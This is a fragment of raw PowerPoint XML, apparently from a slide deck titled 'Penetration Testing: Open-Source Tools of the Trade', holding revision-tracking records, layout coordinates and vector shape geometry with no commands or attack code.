          <pc:sldMk cId="3569207711" sldId="2064"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="add del">
        <pc:chgData name="secureideas@outlook.com" userId="9bce01ac66c2b4c7" providerId="LiveId" clId="{17884CF8-C05E-459D-92A9-2AA72DE877B1}" dt="2018-05-05T02:48:24.372" v="1453" actId="2696"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="760834957" sldId="2065"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="add">
        <pc:chgData name="secureideas@outlook.com" userId="9bce01ac66c2b4c7" providerId="LiveId" clId="{17884CF8-C05E-459D-92A9-2AA72DE877B1}" dt="2018-05-05T02:48:22.980" v="1452"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="1479639258" sldId="2066"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="modSp add">
        <pc:chgData name="secureideas@outlook.com" userId="9bce01ac66c2b4c7" providerId="LiveId" clId="{17884CF8-C05E-459D-92A9-2AA72DE877B1}" dt="2018-05-05T02:50:44.495" v="1597" actId="1076"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="2255783930" sldId="2067"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="secureideas@outlook.com" userId="9bce01ac66c2b4c7" providerId="LiveId" clId="{17884CF8-C05E-459D-92A9-2AA72DE877B1}" dt="2018-05-05T02:50:44.495" v="1597" actId="1076"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2255783930" sldId="2067"/>
            <ac:spMk id="13" creationId="{145192F1-FFF3-4AE3-ACE7-E7E60AFACF3A}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp delSp modSp add">
        <pc:chgData name="secureideas@outlook.com" userId="9bce01ac66c2b4c7" providerId="LiveId" clId="{17884CF8-C05E-459D-92A9-2AA72DE877B1}" dt="2018-05-05T03:00:16.737" v="2188" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="1715815878" sldId="2068"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="secureideas@outlook.com" userId="9bce01ac66c2b4c7" providerId="LiveId" clId="{17884CF8-C05E-459D-92A9-2AA72DE877B1}" dt="2018-05-05T03:00:16.737" v="2188" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1715815878" sldId="2068"/>
            <ac:spMk id="9" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:picChg chg="add mod">
          <ac:chgData name="secureideas@outlook.com" userId="9bce01ac66c2b4c7" providerId="LiveId" clId="{17884CF8-C05E-459D-92A9-2AA72DE877B1}" dt="2018-05-05T03:00:00.506" v="2159" actId="1076"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1715815878" sldId="2068"/>
            <ac:picMk id="11" creationId="{C3923C2F-8029-4CBD-88CE-CDB0DCB1C23C}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="del">
          <ac:chgData name="secureideas@outlook.com" userId="9bce01ac66c2b4c7" providerId="LiveId" clId="{17884CF8-C05E-459D-92A9-2AA72DE877B1}" dt="2018-05-05T02:59:56.040" v="2158" actId="478"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1715815878" sldId="2068"/>
            <ac:picMk id="14" creationId="{7BDBAA98-1412-484B-ABE9-F93EA09163B1}"/>
          </ac:picMkLst>
        </pc:picChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp delSp modSp add">
        <pc:chgData name="secureideas@outlook.com" userId="9bce01ac66c2b4c7" providerId="LiveId" clId="{17884CF8-C05E-459D-92A9-2AA72DE877B1}" dt="2018-05-05T03:14:25.257" v="2223" actId="1076"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="1224523960" sldId="2069"/>
        </pc:sldMkLst>
        <pc:picChg chg="del">
          <ac:chgData name="secureideas@outlook.com" userId="9bce01ac66c2b4c7" providerId="LiveId" clId="{17884CF8-C05E-459D-92A9-2AA72DE877B1}" dt="2018-05-05T03:14:13.805" v="2219" actId="478"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1224523960" sldId="2069"/>
            <ac:picMk id="3" creationId="{56ECD5F0-4C2B-46BF-B358-EFA945C3E8EE}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="add mod">
          <ac:chgData name="secureideas@outlook.com" userId="9bce01ac66c2b4c7" providerId="LiveId" clId="{17884CF8-C05E-459D-92A9-2AA72DE877B1}" dt="2018-05-05T03:14:25.257" v="2223" actId="1076"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1224523960" sldId="2069"/>
            <ac:picMk id="4" creationId="{52683CCF-7B41-4534-8ACB-EFCEA35C633F}"/>
          </ac:picMkLst>
        </pc:picChg>
      </pc:sldChg>
      <pc:sldChg chg="add">
        <pc:chgData name="secureideas@outlook.com" userId="9bce01ac66c2b4c7" providerId="LiveId" clId="{17884CF8-C05E-459D-92A9-2AA72DE877B1}" dt="2018-05-05T06:07:36.890" v="2233"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="3670447475" sldId="2070"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldMasterChg chg="delSldLayout">
        <pc:chgData name="secureideas@outlook.com" userId="9bce01ac66c2b4c7" providerId="LiveId" clId="{17884CF8-C05E-459D-92A9-2AA72DE877B1}" dt="2018-05-05T06:07:09.792" v="2231" actId="2696"/>
        <pc:sldMasterMkLst>
          <pc:docMk/>
          <pc:sldMasterMk cId="2681817455" sldId="2147483648"/>
        </pc:sldMasterMkLst>
        <pc:sldLayoutChg chg="del">
          <pc:chgData name="secureideas@outlook.com" userId="9bce01ac66c2b4c7" providerId="LiveId" clId="{17884CF8-C05E-459D-92A9-2AA72DE877B1}" dt="2018-05-05T06:07:09.792" v="2231" actId="2696"/>
          <pc:sldLayoutMkLst>
            <pc:docMk/>
            <pc:sldMasterMk cId="2681817455" sldId="2147483648"/>
            <pc:sldLayoutMk cId="3391009093" sldId="214748366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B429C7-EA37-654F-B644-C20828F8DF7C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C3752B-F558-3341-B41F-B5AE0A0A27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3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880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90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25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D8A9B0-80EF-A34D-B345-E2DEC5501E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59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37635-1813-44AC-8E25-7526B95B22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BDEF4C-B12A-4D78-BAE7-76F61963E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B493C-5697-4594-9F0C-FFD08EEDD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6CA40-D203-4CD4-93FB-EA9D0B88B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46BA6-D918-459D-BA2A-911C243DE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14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77D7-EFA5-416C-8B8C-68C1008B4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94BAC0-2090-4A7E-BA70-5FDAFD836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2F491-E4CE-4C86-96CD-5200A7E4C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6B3E0-1497-4075-BC3F-2AE026AAD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32D86-FE9D-4D70-8B1C-D3A621C1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3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985415-49AD-46B2-9D68-5DAC2BBDC3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8DE47-9B48-4521-BD92-B1DEBA112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CF870-B123-4F12-AF05-E0536475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9D62D-DD9E-4702-B862-C8E0E17B3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85171-DA02-43CD-9A1A-ED89166F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56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 6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50688" y="2119729"/>
            <a:ext cx="2090556" cy="3666824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914401" y="283886"/>
            <a:ext cx="10363200" cy="566759"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p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914400" y="788678"/>
            <a:ext cx="10363200" cy="537941"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0" algn="ctr">
              <a:buNone/>
              <a:defRPr sz="155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0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743612" y="1657270"/>
            <a:ext cx="4075888" cy="718564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69431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9226885" y="36690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095999" y="36690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1" y="8496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26885" y="849663"/>
            <a:ext cx="2152316" cy="16142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La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3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214782" y="1995374"/>
            <a:ext cx="4328514" cy="2727061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839304"/>
      </p:ext>
    </p:extLst>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition advClick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2815196"/>
      </p:ext>
    </p:extLst>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition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-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93601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FB94-B2E4-435B-B7AA-0C4706433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B279A-16D5-488F-9ED3-08FDB73F0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3E5BA-6CB8-43E3-ABED-BF430964AB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13D9F-F9CA-40A8-AE3F-C515B744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DAB9C-A28D-4CC7-8838-9C4CDCA7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39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CD29-57B7-48EB-A35A-80420AC41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AC12-37F9-46BA-841A-35941EB6D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E4C4E-3DE8-4F90-8C88-C5BC4884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F3E4-8144-4EE7-AEF7-824B95FB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BDDDC-0DDE-4802-9812-CBD90ED40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34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3D8FC-375D-42FD-88AE-541F6775D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F4F8D-8AB1-44A2-86B6-ADD10146B0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DBA75-F232-4838-A643-9B1F3BE7F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C45AB-9F95-4B12-AE80-259A2860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2E2CA8-3630-4DA7-B9A9-EE333DC9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A24E7-C75F-4EED-8399-36928B9F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8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28733-596E-47A2-A42D-77A96EC5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FF1-8CF9-48BA-8157-E6282EB7D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91FCCC-7646-41A8-939A-201BD8925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B08BEA-A248-458C-99ED-AF40444FCE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A28345-6826-4E5A-BBBF-1DBD4ABD3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F825D4-2707-48E4-8929-CA38FB525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90697-F8DE-4DF8-9733-30288AEB5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4B08B-05A6-4E3E-8157-E0C1AF90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560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6F61-317E-4F1B-81B2-A4D394D6C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BC9FC-50F2-431C-A1E5-B0D20BDD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02568-6C7A-4DBE-8800-1167FC76C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3CA986-2C5D-4362-BBE7-E6E78131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696D87-7038-4812-9012-A0EDEC39B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008A33-EF27-4ACC-AED4-C7C5AA01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C214B-DEBE-48BA-AFC1-1C26F0D5A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19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56B5E-EBF4-4065-9B4A-B2374E3A9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75777-964C-4FAA-921B-20A7803CB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5032E-7FAE-4EF3-A3C8-69FCD8893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C8F612-DCBF-4E82-8734-80E6EC37F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3DB4-C25D-41AB-BF06-255CC90C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9356D-154B-4129-B677-9F2E32EA4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9BAC5-39BA-4627-864D-673E3DB5B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ECAB91-FF23-4864-9287-4B87E80887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0B146-1B10-40C7-B260-FFBD5962B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7292A1-5B82-4A7B-9040-936AB7E2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8E13B-8A6D-406A-BF89-C7BD33A8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49401-845B-48F1-94D5-F106B63F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53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C09727-0B41-4F86-8323-4369816B8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162F-95A7-4176-A321-6CD77D984F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7E523-2F66-47EF-9CF0-829EA46FA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E0BEB-FD8B-4D52-80F3-D30C4ED82429}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>5/4/2018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8CE83-472C-440D-9547-9BE624850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F53BB-EBF4-4421-B80E-D24F00C0C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A4F01-3FF2-4E7C-97E5-D229153F5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1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19184" y="4825861"/>
            <a:ext cx="617100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Open-Source Tools of the Trade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1252" y="3514021"/>
            <a:ext cx="8749511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500" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:latin typeface="Roboto" charset="0"/>
                <a:ea typeface="Roboto" charset="0"/>
                <a:cs typeface="Roboto" charset="0"/>
              </a:rPr>
              <a:t>Penetration Testing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41017" y="1015477"/>
            <a:ext cx="2927343" cy="2114295"/>
            <a:chOff x="9989069" y="2722327"/>
            <a:chExt cx="4434264" cy="3202680"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="5" name="Group 4"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="10048118" y="2812306"/>
              <a:ext cx="4313354" cy="2176359"/>
              <a:chOff x="10048118" y="1964813"/>
              <a:chExt cx="4313354" cy="2176359"/>
            </a:xfrm>
            <a:solidFill>
              <a:schemeClr val="bg1">
                <a:lumMod val="95000"/>
              </a:schemeClr>
            </a:solidFill>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="13" name="Freeform 1025"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="13681008" y="2847729"/>
                <a:ext cx="680464" cy="1031944"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 14 w 242"/>
                  <a:gd name="T1" fmla="*/ 367 h 367"/>
                  <a:gd name="T2" fmla="*/ 0 w 242"/>
                  <a:gd name="T3" fmla="*/ 358 h 367"/>
                  <a:gd name="T4" fmla="*/ 229 w 242"/>
                  <a:gd name="T5" fmla="*/ 0 h 367"/>
                  <a:gd name="T6" fmla="*/ 242 w 242"/>
                  <a:gd name="T7" fmla="*/ 9 h 367"/>
                  <a:gd name="T8" fmla="*/ 14 w 242"/>
                  <a:gd name="T9" fmla="*/ 367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367">
                    <a:moveTo>
                      <a:pt x="14" y="367"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="0" y="358"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="229" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="242" y="9"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="14" y="3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14" name="Freeform 1026"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="13298599" y="2926460"/>
                <a:ext cx="421775" cy="947590"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 136 w 150"/>
                  <a:gd name="T1" fmla="*/ 337 h 337"/>
                  <a:gd name="T2" fmla="*/ 0 w 150"/>
                  <a:gd name="T3" fmla="*/ 6 h 337"/>
                  <a:gd name="T4" fmla="*/ 14 w 150"/>
                  <a:gd name="T5" fmla="*/ 0 h 337"/>
                  <a:gd name="T6" fmla="*/ 150 w 150"/>
                  <a:gd name="T7" fmla="*/ 331 h 337"/>
                  <a:gd name="T8" fmla="*/ 136 w 150"/>
                  <a:gd name="T9" fmla="*/ 337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0" h="337">
                    <a:moveTo>
                      <a:pt x="136" y="337"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="0" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="14" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="150" y="331"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="136" y="3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15" name="Freeform 1027"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="13318282" y="2839292"/>
                <a:ext cx="1026320" cy="118098"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 1 w 365"/>
                  <a:gd name="T1" fmla="*/ 42 h 42"/>
                  <a:gd name="T2" fmla="*/ 0 w 365"/>
                  <a:gd name="T3" fmla="*/ 27 h 42"/>
                  <a:gd name="T4" fmla="*/ 364 w 365"/>
                  <a:gd name="T5" fmla="*/ 0 h 42"/>
                  <a:gd name="T6" fmla="*/ 365 w 365"/>
                  <a:gd name="T7" fmla="*/ 16 h 42"/>
                  <a:gd name="T8" fmla="*/ 1 w 365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5" h="42">
                    <a:moveTo>
                      <a:pt x="1" y="42"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="0" y="27"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="364" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="365" y="16"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="4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16" name="Freeform 1028"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="13247985" y="1984495"/>
                <a:ext cx="92791" cy="950400"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 17 w 33"/>
                  <a:gd name="T1" fmla="*/ 338 h 338"/>
                  <a:gd name="T2" fmla="*/ 0 w 33"/>
                  <a:gd name="T3" fmla="*/ 1 h 338"/>
                  <a:gd name="T4" fmla="*/ 16 w 33"/>
                  <a:gd name="T5" fmla="*/ 0 h 338"/>
                  <a:gd name="T6" fmla="*/ 33 w 33"/>
                  <a:gd name="T7" fmla="*/ 338 h 338"/>
                  <a:gd name="T8" fmla="*/ 17 w 33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38">
                    <a:moveTo>
                      <a:pt x="17" y="338"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="0" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="16" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="33" y="338"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="17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17" name="Freeform 1029"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="13256422" y="1967623"/>
                <a:ext cx="1102239" cy="911035"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 382 w 392"/>
                  <a:gd name="T1" fmla="*/ 324 h 324"/>
                  <a:gd name="T2" fmla="*/ 0 w 392"/>
                  <a:gd name="T3" fmla="*/ 13 h 324"/>
                  <a:gd name="T4" fmla="*/ 10 w 392"/>
                  <a:gd name="T5" fmla="*/ 0 h 324"/>
                  <a:gd name="T6" fmla="*/ 392 w 392"/>
                  <a:gd name="T7" fmla="*/ 312 h 324"/>
                  <a:gd name="T8" fmla="*/ 382 w 392"/>
                  <a:gd name="T9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324">
                    <a:moveTo>
                      <a:pt x="382" y="324"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="0" y="13"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="10" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="392" y="312"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="382" y="3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18" name="Rectangle 1030"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="12134499" y="1964813"/>
                <a:ext cx="1135981" cy="4217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19" name="Freeform 1031"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="12123250" y="1967623"/>
                <a:ext cx="1158476" cy="660783"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 8 w 412"/>
                  <a:gd name="T1" fmla="*/ 235 h 235"/>
                  <a:gd name="T2" fmla="*/ 0 w 412"/>
                  <a:gd name="T3" fmla="*/ 221 h 235"/>
                  <a:gd name="T4" fmla="*/ 404 w 412"/>
                  <a:gd name="T5" fmla="*/ 0 h 235"/>
                  <a:gd name="T6" fmla="*/ 412 w 412"/>
                  <a:gd name="T7" fmla="*/ 14 h 235"/>
                  <a:gd name="T8" fmla="*/ 8 w 412"/>
                  <a:gd name="T9" fmla="*/ 23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235">
                    <a:moveTo>
                      <a:pt x="8" y="235"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="0" y="221"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="404" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="412" y="14"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="8" y="2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0" name="Freeform 1032"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="11167227" y="2586227"/>
                <a:ext cx="972895" cy="292431"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 4 w 346"/>
                  <a:gd name="T1" fmla="*/ 104 h 104"/>
                  <a:gd name="T2" fmla="*/ 0 w 346"/>
                  <a:gd name="T3" fmla="*/ 89 h 104"/>
                  <a:gd name="T4" fmla="*/ 342 w 346"/>
                  <a:gd name="T5" fmla="*/ 0 h 104"/>
                  <a:gd name="T6" fmla="*/ 346 w 346"/>
                  <a:gd name="T7" fmla="*/ 16 h 104"/>
                  <a:gd name="T8" fmla="*/ 4 w 346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6" h="104">
                    <a:moveTo>
                      <a:pt x="4" y="104"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="0" y="89"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="342" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="346" y="16"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4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1" name="Freeform 1033"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="10343362" y="1964813"/>
                <a:ext cx="1793950" cy="354291"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 3 w 638"/>
                  <a:gd name="T1" fmla="*/ 126 h 126"/>
                  <a:gd name="T2" fmla="*/ 0 w 638"/>
                  <a:gd name="T3" fmla="*/ 111 h 126"/>
                  <a:gd name="T4" fmla="*/ 635 w 638"/>
                  <a:gd name="T5" fmla="*/ 0 h 126"/>
                  <a:gd name="T6" fmla="*/ 638 w 638"/>
                  <a:gd name="T7" fmla="*/ 15 h 126"/>
                  <a:gd name="T8" fmla="*/ 3 w 638"/>
                  <a:gd name="T9" fmla="*/ 12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8" h="126">
                    <a:moveTo>
                      <a:pt x="3" y="126"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="0" y="111"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="635" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="638" y="15"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3" y="1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2" name="Rectangle 1034"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="12112003" y="1987307"/>
                <a:ext cx="44989" cy="62141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3" name="Freeform 1035"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="10334925" y="2279738"/>
                <a:ext cx="851987" cy="596109"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 294 w 303"/>
                  <a:gd name="T1" fmla="*/ 212 h 212"/>
                  <a:gd name="T2" fmla="*/ 0 w 303"/>
                  <a:gd name="T3" fmla="*/ 13 h 212"/>
                  <a:gd name="T4" fmla="*/ 9 w 303"/>
                  <a:gd name="T5" fmla="*/ 0 h 212"/>
                  <a:gd name="T6" fmla="*/ 303 w 303"/>
                  <a:gd name="T7" fmla="*/ 199 h 212"/>
                  <a:gd name="T8" fmla="*/ 294 w 303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212">
                    <a:moveTo>
                      <a:pt x="294" y="212"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="0" y="13"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="9" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="303" y="199"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="294" y="2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4" name="Freeform 1036"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="10059365" y="2839292"/>
                <a:ext cx="1124734" cy="624227"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 7 w 400"/>
                  <a:gd name="T1" fmla="*/ 222 h 222"/>
                  <a:gd name="T2" fmla="*/ 0 w 400"/>
                  <a:gd name="T3" fmla="*/ 208 h 222"/>
                  <a:gd name="T4" fmla="*/ 393 w 400"/>
                  <a:gd name="T5" fmla="*/ 0 h 222"/>
                  <a:gd name="T6" fmla="*/ 400 w 400"/>
                  <a:gd name="T7" fmla="*/ 14 h 222"/>
                  <a:gd name="T8" fmla="*/ 7 w 400"/>
                  <a:gd name="T9" fmla="*/ 22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0" h="222">
                    <a:moveTo>
                      <a:pt x="7" y="222"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="0" y="208"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="393" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="400" y="14"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7" y="2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5" name="Freeform 1037"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="10048118" y="2290984"/>
                <a:ext cx="320549" cy="1158477"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 15 w 114"/>
                  <a:gd name="T1" fmla="*/ 412 h 412"/>
                  <a:gd name="T2" fmla="*/ 0 w 114"/>
                  <a:gd name="T3" fmla="*/ 408 h 412"/>
                  <a:gd name="T4" fmla="*/ 99 w 114"/>
                  <a:gd name="T5" fmla="*/ 0 h 412"/>
                  <a:gd name="T6" fmla="*/ 114 w 114"/>
                  <a:gd name="T7" fmla="*/ 4 h 412"/>
                  <a:gd name="T8" fmla="*/ 15 w 114"/>
                  <a:gd name="T9" fmla="*/ 412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412">
                    <a:moveTo>
                      <a:pt x="15" y="412"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="0" y="408"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="99" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="114" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="15" y="4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6" name="Freeform 1038"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="12128875" y="2589040"/>
                <a:ext cx="1195030" cy="368352"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 421 w 425"/>
                  <a:gd name="T1" fmla="*/ 131 h 131"/>
                  <a:gd name="T2" fmla="*/ 0 w 425"/>
                  <a:gd name="T3" fmla="*/ 15 h 131"/>
                  <a:gd name="T4" fmla="*/ 4 w 425"/>
                  <a:gd name="T5" fmla="*/ 0 h 131"/>
                  <a:gd name="T6" fmla="*/ 425 w 425"/>
                  <a:gd name="T7" fmla="*/ 116 h 131"/>
                  <a:gd name="T8" fmla="*/ 421 w 425"/>
                  <a:gd name="T9" fmla="*/ 131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131">
                    <a:moveTo>
                      <a:pt x="421" y="131"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="0" y="15"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="425" y="116"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="421" y="1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7" name="Freeform 1039"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="12564711" y="3845928"/>
                <a:ext cx="1141605" cy="295244"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 4 w 406"/>
                  <a:gd name="T1" fmla="*/ 105 h 105"/>
                  <a:gd name="T2" fmla="*/ 0 w 406"/>
                  <a:gd name="T3" fmla="*/ 90 h 105"/>
                  <a:gd name="T4" fmla="*/ 402 w 406"/>
                  <a:gd name="T5" fmla="*/ 0 h 105"/>
                  <a:gd name="T6" fmla="*/ 406 w 406"/>
                  <a:gd name="T7" fmla="*/ 15 h 105"/>
                  <a:gd name="T8" fmla="*/ 4 w 406"/>
                  <a:gd name="T9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105">
                    <a:moveTo>
                      <a:pt x="4" y="105"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="0" y="90"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="402" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="406" y="15"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4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8" name="Freeform 1040"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="12530969" y="2918023"/>
                <a:ext cx="801373" cy="669218"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
